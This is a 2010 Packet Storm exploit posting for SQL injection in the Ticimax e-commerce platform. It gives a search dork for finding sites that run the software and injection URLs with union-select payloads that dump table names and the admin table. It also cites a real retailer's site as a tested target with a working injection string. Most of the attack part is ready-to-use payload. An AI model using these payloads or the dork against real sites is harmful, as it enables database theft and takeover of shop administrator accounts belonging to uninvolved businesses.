Ticimax E-Ticaret SQL Injection

2010-06-02T00:00:00
ID PACKETSTORM:90188
Type packetstorm
Reporter Neuromancer
Modified 2010-06-02T00:00:00

Description

                                        
                                            `  
  
  
# Exploit Title: [Ticimax E-Ticaret ( SQL Injection ) ]  
# Date: [01.06.2010]  
# Author: [Neuromancer]  
# Version: [app version]  
# Tested on: [http://www.adidasnet.com/kategori.asp?id=-38+union+select+0,group_concat%28table_name%29,2,3,4+from+information_schema.tables]  
# CVE : [if exists]  
# Code : [exploit code]   
  
  
#####################  
# Author: [Neuromancer]  
# contact : msn[at]neurom4ncer[dot]com  
# From : TURKEY  
#####################  
  
  
Ticimax e-ticaret ( Kategori.asp, urun_detay.aspLocal SQL Injection Vulnerability  
  
Dork : "Bu Site Ticimax E-Ticaret yazılımı ile hazırlanmıştır"  
  
  
======================================================================  
  
--=[ Vuln C0de ]=-  
  
[-] localhost/kategori.asp?id='  
[-] localhost/urun_detay.asp?id='  
  
http://[Site].com/kategori.asp?id=1 order by 1  
http://[Site].com/kategori.asp?id=1 union select x,x,group_concat(table_name)+from+information.schema.tables  
  
or  
  
http://[Site].com/kategori.asp?id=1 union select * from admin  
  
=========================| -=[ Attackerz Crew co. ]=- |=========================  
  
Gr33t'z; h4cker.tr, by_fatih, by.kiki, TheNesa, RedMasTeR  
  
  
_________________________________________________________________  
Windows Live: Arkadaşlarınız size e-posta gönderdiklerinde Flickr, Twitter ve Digg'deki hareketlerinizi görürler.  
http://www.microsoft.com/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:tr-tr:SI_SB_3:092010  
  
  
`